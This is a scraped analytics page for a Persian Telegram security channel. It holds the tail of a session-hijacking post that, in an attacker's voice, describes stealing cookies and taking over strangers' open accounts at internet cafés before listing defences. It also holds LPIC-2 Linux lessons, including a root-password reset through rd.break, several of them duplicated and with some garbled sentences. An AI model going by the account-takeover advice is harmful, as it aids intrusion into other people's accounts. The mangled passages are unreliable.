شبکه پیشرفته | Network_advanced
Открыть в Telegram
🔒 فراتر از یک اتصال ساده. آموزش مفاهیم پیشرفته شبکه، امنیت سایبری و محافظت از دادهها در دنیای ناامن امروز. 🛡 نبض امنیت زیرساختهای دیجیتال در دست شماست. پیج اینستاگرام: https://instagram.com/network_adnvanced تبلیغات در مجموعه: @ShabTab_ads
Больше2 532
Подписчики
-224 часа
-77 дней
-2130 дней
Загрузка данных...
Похожие каналы
Входящие и исходящие упоминания
---
---
---
---
---
---
Привлечение подписчиков
сентябрь '26
сентябрь '260
в 0 каналах
август '26
+9
в 0 каналах
Get PRO
июль '26
+20
в 0 каналах
Get PRO
июнь '26
+16
в 0 каналах
Get PRO
май '26
+11
в 0 каналах
Get PRO
апрель '26
+9
в 0 каналах
Get PRO
март '26
+11
в 0 каналах
Get PRO
февраль '26
+742
в 3 каналах
Get PRO
январь '26
+4
в 0 каналах
Get PRO
декабрь '25
+6
в 0 каналах
Get PRO
ноябрь '25
+13
в 0 каналах
Get PRO
октябрь '25
+12
в 0 каналах
Get PRO
сентябрь '25
+9
в 0 каналах
Get PRO
август '25
+6
в 0 каналах
Get PRO
июль '25
+9
в 0 каналах
Get PRO
июнь '25
+6
в 0 каналах
Get PRO
май '25
+8
в 0 каналах
Get PRO
апрель '25
+8
в 0 каналах
Get PRO
март '25
+10
в 0 каналах
Get PRO
февраль '25
+5
в 0 каналах
Get PRO
январь '25
+25
в 0 каналах
Get PRO
декабрь '24
+16
в 0 каналах
Get PRO
ноябрь '24
+15
в 0 каналах
Get PRO
октябрь '24
+15
в 0 каналах
Get PRO
сентябрь '24
+13
в 0 каналах
Get PRO
август '24
+112
в 13 каналах
Get PRO
июль '24
+193
в 21 каналах
Get PRO
июнь '240
в 27 каналах
Get PRO
май '240
в 8 каналах
Get PRO
апрель '240
в 4 каналах
Get PRO
март '24
+1
в 0 каналах
Get PRO
февраль '240
в 0 каналах
Get PRO
январь '240
в 0 каналах
Get PRO
декабрь '230
в 0 каналах
Get PRO
ноябрь '230
в 0 каналах
Get PRO
октябрь '230
в 0 каналах
Get PRO
сентябрь '230
в 0 каналах
Get PRO
август '230
в 0 каналах
Get PRO
июль '230
в 0 каналах
Get PRO
июнь '230
в 0 каналах
Get PRO
май '230
в 0 каналах
Get PRO
апрель '230
в 0 каналах
Get PRO
март '230
в 0 каналах
Get PRO
февраль '230
в 0 каналах
Get PRO
январь '230
в 0 каналах
Get PRO
декабрь '22
+2
в 0 каналах
Get PRO
ноябрь '22
+7
в 0 каналах
Get PRO
октябрь '22
+4
в 0 каналах
Get PRO
сентябрь '22
+4
в 0 каналах
Get PRO
август '22
+4
в 0 каналах
Get PRO
июль '22
+7
в 0 каналах
Get PRO
июнь '22
+204
в 0 каналах
Get PRO
май '22
+2 163
в 0 каналах
Get PRO
апрель '22
+288
в 0 каналах
Get PRO
март '22
+1 196
в 0 каналах
Get PRO
февраль '22
+1 601
в 0 каналах
Get PRO
январь '22
+1 364
в 0 каналах
Get PRO
декабрь '21
+1 051
в 0 каналах
Get PRO
ноябрь '21
+925
в 0 каналах
Get PRO
октябрь '21
+367
в 0 каналах
Get PRO
сентябрь '21
+422
в 0 каналах
Get PRO
август '21
+1 330
в 0 каналах
Get PRO
июль '21
+662
в 0 каналах
Get PRO
июнь '21
+2 811
в 0 каналах
| Дата | Привлечение подписчиков | Упоминания | Каналы | |
| 03 сентября | 0 | |||
| 02 сентября | 0 | |||
| 01 сентября | 0 |
\n\nحالا هر کی اون صفحه رو ببینه، بیخبر کوکیش میاد پیش من. بعد من با اون کوکی میرم تو سایت. تموم شد. تبریک میگم، من الان تویی!\n\n---\n\nروش دوم: ابزارایی که کارو واست راحت میکنن\n\nشاید کدنویسی بلد نباشی، نگران نباش. یکی برات ابزار ساخته:\n\n· EditThisCookie: یه افزونه کروم. میتونی کوکی رو ببینی، عوض کنی، هر کاری دوست داری بکنی\n· Cookie-Editor: همون کارو میکنه فقط تمیزتر\n· Wireshark: این دیگه حرفهایاس. اگه بلد باشی باهاش کار کنی، هیچی ازت قایم نمیشه\n\n---\n\nروش سوم: کافینت یادت نره\n\nرفتی کافینت، یه نفر قبلاً اونجا بوده و حساب دیوارش یا روبیکا یا حتی ایمیل خودش رو باز کرده. بلند شده رفته ولی مرورگر رو نبسته. احمق بوده دیگه. تو میآی بشینی پای همون سیستم. مرورگر رو که باز میکنی، میبینی هنوز تو حساب اون آدمی!\n\nحالا چکار میکنی؟\n\n· میری پیامهاش رو میخونی\n· آگهی میزاری به اسم خودش تو دیوار\n· به دوستاش پیام میدی تو روبیکا\n· اگه سایت اجازه بده، پسوردش رو عوض میکنی\n\nهمش با یه کوکی که مونده تو مرورگر. به خدا اینقدر ساده اس که گاهی خودم خندهم میگیره.\n\n---\n\nچطور جلوش رو بگیریم؟ (اگه نمیخوای بدبخت بشی)\n\nاگه کاربری:\n\n· مرورگر رو کامل ببند. فقط تب رو نبند\n· از حالت ناشناس استفاده کن\n· بعد کار حتماً Logout بزن\n· به HTTPS سایتا دقت کن. اون قفل سبز یعنی امنه\n\nاگه برنامهنویسی:\n\n· کوکی رو HttpOnly کن\n· Secure flag رو بذار\n· Session رو زود منقضی کن\n· ۲FA بذار برا سایتت\n\n---\n\nحرف آخر:\n\nSession دزدی یعنی یکی میاد کوکی تو رو میگیره و میره تو حسابت. نه پسوردتو میخواد، نه ایمیلتو. فقط کافیه تو یه لحظه غافل باشی.\n\nپس:\n\n· Logout یادت نره\n· مرورگرتو باز نذار\n· ۲FA بزن\n· تو کافینتا مراقب باش\n\n---\n\n#SessionHijacking #WebSecurity #XSS #هک #امنیت\n\nهزاران آموزش شبکه و امنیت:\n@Network_advanced","datePublished":"2026-02-27T21:41:46Z","dateModified":"2026-02-27T21:41:46Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":63},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3658","url":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3658","mainEntityOfPage":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3658","headline":"LPIC‑2 | Lesson 4 ### درس ۴: معماری ذخیرهسازی پیشرفته (LVM & RAID) – پادشاهی بر قلمرو دیسکها! اگه هنوز فکر…","articleBody":"LPIC‑2 | Lesson 4\n\n### درس ۴: معماری ذخیرهسازی پیشرفته (LVM & RAID) – پادشاهی بر قلمرو دیسکها!\n\nاگه هنوز فکر میکنی پارتیشنبندی یعنی فقط fdisk و ساختن چندتا درایو خشک و خالی، همین الان مدرک لینوکست رو پاره کن! تو LPIC-2، ما دیسک رو به زنجیر میکشیم. ما یاد میگیریم چطور از ترکیب دیسکهای داغون، یه ابر-ذخیرهساز بسازیم که حتی با سوختن دیسک هم آخ نگه!\n\n#### ۱. زنده کردن مردگان با Software RAID (ابزار mdadm):\nتو دنیای واقعی، دیسکها میسوزن. این یه حقیقته. ولی یه مهندس لینوکس طوری سیستم رو میچینه که دیتاسنتر آتیش بگیره ولی دیتا نپره!\n* RAID 0 (سرعت مرگبار): دیتا رو تیکه تیکه میکنه روی دیسکها. سرعت عالی، ولی اگه یه دیسک بسوزه، فاتحه کل دیتا خوندهست. (فقط برای کش و تمپ!)\n* RAID 1 (آینه): هر چی تو این بنویسی، تو اون یکی هم کپی میشه. امنیت ۱۰۰٪، ولی نصف ظرفیتت میپره.\n* RAID 5 & 6 (تعادل قدرت): استفاده از Parity. تو RAID 5 یک دیسک و تو RAID 6 دو دیسک همزمان بسوزن، سیستم عین ساعت کار میکنه.\n* فرمان عملیاتی: mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/sdb1 /dev/sdc1 /dev/sdd1\n* مانیتورینگ وضعیت: همیشه چشمت به /proc/mdstat باشه. اگه دیدی نوشته [U_U], یعنی یکی از دیسکهات مرخص شده و باید سریع جایگزینش کنی!\n\n#### ۲. انعطاف مطلق با LVM (Logical Volume Manager):\nLVM یعنی آزادی! یعنی وقتی پارتیشن /var پر شد، لازم نیست سرور رو خاموش کنی یا پارتیشن رو دیلیت کنی.\n* سلسله مراتب قدرت:\n 1. PV (Physical Volume): تبدیل پارتیشنهای خام به خمیر بازی لینوکس! (pvcreate /dev/sdb1)\n 2. VG (Volume Group): ریختن همه PVها تو یه ظرف بزرگ. انگار یه دیسک غولآسا داری. (vgcreate my_data /dev/sdb1 /dev/sdc1)\n 3. LV (Logical Volume): بریدن تکههای دلخواه از اون ظرف بزرگ. (lvcreate -L 100G -n web_data my_data)\n* افزایش حجم در حال پرواز (On-the-fly):\n lvextend -L +50G /dev/my_data/web_data -r\n اون سوئیچ -r معجزهست! همزمان هم حجم رو زیاد میکنه، هم فایلسیستم رو (بدون Unmount کردن!).\n\n#### ۳. سفر در زمان با LVM Snapshots:\nاین یکی از خطرناکترین و جذابترین ویژگیهای LVM هست. میخوای آپدیت سنگین بزنی و میترسی سیستم بترکه؟ یه Snapshot بگیر!\nlvcreate -s -n backup_before_update -L 5G /dev/my_data/web_data\nحالا یه \"تصویر\" از لحظه حال داری. اگه گند زدی، میتونی برگردی به عقب (Rollback). این یعنی بیمهی عمر دیتای تو!\n\n#### ۴. عیبیابی و جراحی دیسکهای خراب:\nوقتی یه دیسک تو RAID میسوزه، نباید دست و پات رو گم کنی.\n1. دیسک خراب رو Fail کن: mdadm /dev/md0 --fail /dev/sdb1\n2. دیسک رو خارج کن: mdadm /dev/md0 --remove /dev/sdb1\n3. دیسک جدید رو بنداز و اضافه کن: mdadm /dev/md0 --add /dev/sde1\nحالا بشین و تماشا کن که چطور سیستم خودش رو بازسازی (Rebuild) میکنه.\n\nمهندسی دیسک یعنی تو هیچوقت غافلگیر نمیشی. تو همیشه یه نقشه جایگزین داری. تو به دیسکها دستور میدی، نه اونا به تو! قدرت مدیریت ذخیرهسازی، قلب تپنده هر دیتاسنتره.\n\nریاکشنها رو بترکونید که درس ۵ قراره بریم سراغ اعماق شبکه و فایروالهای پیشرفته!\n\nهزاران آموزش شبکه و امنیت (مخصوص کسانی که دیسکها رو به زانو درمیآورند):\n@Network_advanced\n\n#LPIC2 #LVM #RAID #Mdadm #StorageArchitecture #SysAdmin #AdvancedLinux #DiskManagement #Snapshot #DataRecovery","datePublished":"2026-02-27T16:43:59Z","dateModified":"2026-02-27T16:43:59Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":87},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":7}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3657","url":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3657","mainEntityOfPage":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3657","headline":"LPIC‑2 | Lesson 3 ### درس ۳: احیای سیستم و عیبیابی بوت پیشرفته (System Startup Recovery) – بازگرداندن مُرده…","articleBody":"LPIC‑2 | Lesson 3\n\n### درس ۳: احیای سیستم و عیبیابی بوت پیشرفته (System Startup Recovery) – بازگرداندن مُرده از گور!\n\nوقتی سرور اصلی دیتاسنتر بالا نمیاد، وقتی همه از ناامیدی سرشون رو میگیرن، اونجاست که تو، یک مهندس LPIC-2، وارد میدون میشی. اینجا دیگه خبری از reboot نیست؛ اینجا بحث بازگشت به زندگی در شرایط بحرانیه.\n\n#### ۱. ورود به دنیای GRUB2 Shell (غار اسرارآمیز بوت):\nاگه فایل grub.cfg خراب بشه، سیستم دیگه هیچی نمیفهمه. باید مثل یه هکر حرفهای، بری تو GRUB Shell.\n* وقتی گراب بالا میاد، کلید c رو بزن. وارد محیط grub> میشی.\n* پیدا کردن بوت لودر: اول باید بدونی کرنل و initrd کجا هستن:\n grub> ls (لیست کردن دیسکها و پارتیشنها)\n grub> ls (hd0,1)/boot/ (شاید اینجا باشه!)\n* بوت دستی (Manual Boot): حالا که فهمیدی کرنل و initrd کجا پنهان شدن، دستی سیستم رو بوت کن:\n grub> set root=(hd0,1) (پارتیشن روت رو مشخص کن)\n grub> linux /boot/vmlinuz-$(uname -r) root=/dev/sda1 ro (آدرس کرنل و روت واقعی سیستم رو بده، ro یعنی Read-Only)\n grub> initrd /boot/initramfs-$(uname -r).img (آدرس initramfs رو بده)\n grub> boot (اگه همه چی درست بود، سیستم بالا میاد!)\n فاجعه: اگه بعد از بوت، سیستم بالا اومد و فهمیدی اشتباه کردی، قبل از اینکه بره تو حالت Read-Only، سریع rw (Read-Write) کن و گراب رو ترمیم کن.\n\n#### **۲. گریز از سیستمعامل با rd.break و systemd.unit=rescue.target:**\nدور زدن پسورد روت:ت:** فرض کن پسورد روت رو فراموش کردی، یا یکی خرابکاری کرده و پسورد رو عوض کرده. ریبوت کن، تو گراب خط linux رو پیدا کن، آخرش rd.break رو اضافه کن.\n ... ro crashkernel=auto rd.break\n حالا تو محیط initramfs هستی. اینجا روت (/) سیستم عامل شما نیست، بلکه یه محیط موقته.\n mount -o remount,rw /sysroot (فایلسیستم اصلی رو برای نوشتن مانت کن)\n chroot /sysroot (وارد محیط سیستم عامل اصلی شو)\n passwd root (پسورد روت رو عوض کن!)\n touch /.autorelabel (اگر SELinux فعاله، تا لیبلها درست بشن)\n exit (از chroot خارج شو)\n exit (از initramfs خارج شو، سیستم ادامه بوت میده)\n* **Rescue Mode با systemd:** برای ورود به حداقلترین حالت سیستمعامل (فقط سرویسهای ضروری):\n ... ro crashkernel=auto systemd.unit=rescue.target\n اینجا میتونی با حداقل سرویسها، مشکل رو ریشهیابی و حل کنی.\n\n#### **۳. بازگرداندن فایلسیستم از مرگ با fsck -b:**\nیکی از رایجترین دلایل بالا نیامدن سرور، خراب شدن Superblock فایلسیستمه. Superblock مثل فهرست اصلی کتابه؛ اگه خراب بشه، سیستم دیگه نمیدونه فایلها کجپیدا کردن سوپربلاکهای پشتیبان:ی پشتیبان:** هر فایلسیستم ext کپیهای پشتیبان از Superblock داره. این دستور آدرسشون رو بهت میده:\n mke2fs -n /dev/sda1 (به جای sda1 پارتیشن مورد نظرت رو بزن)\n خروجی یه سری عدد بهت میده (مثلاً 23456, 45678, ...).\n* **ترمیم با پشتیبان:** حالا با یکی از اون اعداد، فایلسیستم رو ترمیم کن:\n fsck -b 23456 /dev/sda1\n این یعنی داری با یه کپی سالم از Superblock، دیسک مُرده رو به زندگی برمیگردونی!\n\nوقتی سیستمت میمیره و تو با این دستورات جادویی، نفس رو بهش برمیگردونی، وقتی میتونی مثل یه جراح، قلب لینوکس رو در حال خونریزی ترمیم کنی، اونجاست که معنی واقعی LPIC-2 رو میفهمی. تو دیگه یه ادمناجی سیستمه **ناجی سیستم** هستی!\n\nریاکشنها رو بکوب تا بریم برای درس بعدی که قراره وارد قلمروی شبکه بشیم و با فایروال و پکتها بازی کنیم!\n\nهزاران آموزش شبکه و امنیت (مخصوص حرفهایها و ناجیان سیستم):\n@Network_advanced\n\n#LPIC2 #BootRecovery #GRUB2 #Initramfs #Fsck #SystemRescue #HardcoreLinux #Troubleshooting","datePublished":"2026-02-27T16:40:47Z","dateModified":"2026-02-27T16:40:47Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":87},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":5}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3656","url":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3656","mainEntityOfPage":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3656","headline":"LPIC‑2 | Lesson 2 ### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم! اگه…","articleBody":"LPIC‑2 | Lesson 2\n\n### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم!\n\nاگه فکر میکنی با apt install و yum update لینوکس رو میشناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیشفرض گله دارن، خودش آستین بالا میزنه و کرنل رو دوباره مینویسه! این دیگه بازی بچهها نیست، این نفوذ به عمیقترین لایههای سیستمعامله.\n\n#### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking)\nاولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux.\nاونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig.\n* بازی با پرچمها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو میخوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. میخوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکلهای شبکه که کمتر استفاده میشن رو [M] میگیریم).\n* حذف ماژولهای مُرده: میتونی درایورهای سختافزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی!\n\n#### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast)\nحالا که انتخابهات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی:\nmake -j$(nproc) && make modules_install && make install\n* **راز $(nproc):** این دستور تعداد هستههای CPUت رو برمیگردونه. با -j داری به make میگیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریعترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی.\nبعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار میگیره. ماژولها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی.\n\n#### **۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning):**\nگاهی وقتا نمیتونی سرور رو ریبوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل میکافزایش سقف فایلهای باز (File Descriptors):tors):** برای دیتابیسهای بزرگ یا وبسرورهای پربازدید:\n echo \"fs.file-max = 1000000\" >> /etc/sysctl.conf\n sysctl -p (برای اعمال فواخطار:اخطار:** این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف میکفعال کردن IP Forwarding (برای روتر کردن سرور):سرور):**\n echo \"net.ipv4.ip_forward = 1\" >> /etc/sysctl.conf\n sysctl -p\n* **کنترل سوآپ (Swappiness):** اگه سیستمت الکی میره تو سوآپ و کند میشه، میتونی swappiness رو کم کنی (بین ۰ تا ۱۰۰، پیشفرض ۶۰):\n echo \"vm.swappiness = 10\" >> /etc/sysctl.conf\n sysctl -p\n **نتیجه:** هرچی swappiness کمتر، هسته دیرتر سراغ فضای سوآپ میره و بیشتر سعی میکنه از RAM استفاده کنه.\n\nوقتی هسته رو طوری تنظیم میکنی که ذرهای از منابع سیستمت هدر نره، وقتی میتونی در حال پرواز (Live) تنظیماتش رو دستکاری کنی، اونجاست که دیگه فقط یه ادمجادوگر سیستم**جادوگر سیستم** شدی! این یعنی قدرت بیحد و حصر.\n\nریاکشنها رو بکوب تا بریم سراغ درس ۳ که قراره با بوت لودرها کشتی بگیریم و از دل خاکستر، سیستم رو زنده کنیم!\n\nهزاران آموزش شبکه و امنیت (مخصوص حرفهایها):\n@Network_advanced\n\n#LPIC2 #Kernel #LinuxKernel #Sysctl #Compilation #AdvancedLinux #HardcoreLinux #SystemHacking","datePublished":"2026-02-27T16:36:57Z","dateModified":"2026-02-27T16:36:57Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":85},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3655","url":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3655","mainEntityOfPage":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3655","headline":"LPIC‑2 | Lesson 2 ### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم! اگه…","articleBody":"LPIC‑2 | Lesson 2\n\n### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم!\n\nاگه فکر میکنی با apt install و yum update لینوکس رو میشناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیشفرض گله دارن، خودش آستین بالا میزنه و کرنل رو دوباره مینویسه! این دیگه بازی بچهها نیست، این نفوذ به عمیقترین لایههای سیستمعامله.\n\n#### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking)\nاولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux.\nاونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig.\n* بازی با پرچمها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو میخوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. میخوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکلهای شبکه که کمتر استفاده میشن رو [M] میگیریم).\n* حذف ماژولهای مُرده: میتونی درایورهای سختافزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی!\n\n#### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast)\nحالا که انتخابهات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی:\nmake -j$(nproc) && make modules_install && make install\n* راز $(nproc): این دستور تعداد هستههای CPUت رو برمیگردونه. با -j داری به make میگیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریعترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی.\nبعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار میگیره. ماژولها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی.\n\n#### ۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning):\nگاهی وقتا نمیتونی سرور رو ریبوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل میکافزایش سقف فایلهای باز (File Descriptors):tors):** برای دیتابیسهای بزرگ یا وبسرورهای پربازدید:\n echo \"fs.file-max = 1000000\" >> /etc/sysctl.conf\n sysctl -p (برای اعمال فواخطار:اخطار: این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف میکفعال کردن IP Forwarding (برای روتر کردن سرور):سرور):\n echo…","datePublished":"2026-02-27T16:34:14Z","dateModified":"2026-02-27T16:35:16Z","author":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"publisher":{"@type":"Organization","name":"شبکه پیشرفته | Network_advanced","url":"https://telemetr.io/ru/channels/1458308447-network_advanced","image":"https://img.tlmtr.io/c/1AGUDZ/5828170423839952101?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":1}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3654","url":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3654","mainEntityOfPage":"https://telemetr.io/ru/channels/1458308447-network_advanced/posts/3654","headline":"LPIC‑2 | Lesson 2 درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management)**، این بار با چاشنی وحشیگری بیش…","articleBody":"LPIC‑2 | Lesson 2\n\nدرس ۲: جراحی هسته لینوکس (Kernel Compilation & Management)**، این بار با چاشنی وحشیگری بیشتر و جزئیات دقیق، آماده برای تلگرام.\n\n---\n\n### درس ۲: جراحی هسته لینوکس (Kernel Compilation & Management) – هنر تسلط بر قلب سیستم!\n\nاگه فکر میکنی با apt install و yum update لینوکس رو میشناسی، سخت در اشتباهی. یه مهندس LPIC-2 کسیه که وقتی همه از کرنل پیشفرض گله دارن، خودش آستین بالا میزنه و کرنل رو دوباره مینویسه! این دیگه بازی بچهها نیست، این نفوذ به عمیقترین لایههای سیستمعامله.\n\n#### ۱. نیشتر زدن به سورس کرنل: (Source Code Hacking)\nاولین قدم؟ دانلود سورس کرنل از kernel.org. بعدش استخراج تو /usr/src/linux.\nاونجا هزاران فایل و پوشه هستن. حالا ابزار اصلی: make menuconfig.\n* بازی با پرچمها ([*] vs [M]): اینجا دیگه تصمیم با توئه. یه درایور خاص رو میخوای مستقیم بچسبونی به کرنل و حجمش رو زیاد کنی؟ [*] رو انتخاب کن. میخوای به صورت ماژول جداگانه لود بشه تا بتونی بعداً برش داری یا لودش کنی؟ [M] رو انتخاب کن. (مثلاً درایورهای کارت شبکه خاص، یا پروتکلهای شبکه که کمتر استفاده میشن رو [M] میگیریم).\n* حذف ماژولهای مُرده: میتونی درایورهای سختافزارهایی رو که اصلاً نداری، کلاً از کرنل حذف کنی تا هم حجمش کم بشه، هم سرعت بوت بالا بره، و هم سطح حمله (Attack Surface) سیستم رو کاهش بدی. این یعنی امنیت واقعی!\n\n#### ۲. به کار انداختن موتور کمپایل: (The Compilation Beast)\nحالا که انتخابهات رو کردی، وقتشه آهن و فولاد رو به کد تبدیل کنی:\nmake -j$(nproc) && make modules_install && make install\n* **راز $(nproc):** این دستور تعداد هستههای CPUت رو برمیگردونه. با -j داری به make میگیتمام توان پردازشی سرورور** استفاده کنه تا کمپایل توی سریعترین زمان ممکن تموم بشه. اگه سرور زیر بار سنگینه، این رو بدون -j بزن وگرنه ممکنه سیستم رو قفل کنی.\nبعد از کمپایل:ل:** فایل هسته جدیدت (مثلاً vmlinuz-5.15.0-custom) تو /boot قرار میگیره. ماژولها هم میرن تو /lib/modules/5.15.0-custom/. گراب (GRUB) هم به طور خودکار باید شناساییش کنه. اگه نکرد، باید دستی update-grub یا grub2-mkconfig رو اجرا کنی.\n\n#### **۳. تغییر هسته در حال پرواز با sysctl (Live Kernel Tuning):**\nگاهی وقتا نمیتونی سرور رو ریبوت کنی. اینجا sysctl مثل یه چاقوی جراحی دقیق عمل میکافزایش سقف فایلهای باز (File Descriptors):tors):** برای دیتابیسهای بزرگ یا وبسرورهای پربازدید:\n echo \"fs.file-max = 1000000\" >> /etc/sysctl.conf\n sysctl -p (برای اعمال فواخطار:اخطار:** این عدد رو بیش از حد بالا نبر، چون هر فایل دیسکریپتور خودش مقداری RAM مصرف میکفعال کردن IP Forwarding (برای روتر کردن سرور):سرور):**\n echo \"net.ipv4.ip_forward = 1\" >> /etc/sysctl.conf\n sysctl -p\n* **کنترل سوآپ (Swappiness):** اگه سیستمت الکی میره تو سوآپ و کند میشه، میتونی swappiness رو کم کنی (بین ۰ تا ۱۰۰، پیشفرض ۶۰):\n echo \"vm.swappiness = 10\" >> /etc/sysctl.conf\n sysctl -p\n **نتیجه:** هرچی swappiness کمتر، هسته دیرتر سراغ فضای سوآپ میره و بیشتر سعی میکنه از RAM استفاده کنه.\n\nوقتی هسته رو طوری تنظیم میکنی که ذرهای از منابع سیستمت هدر نره، 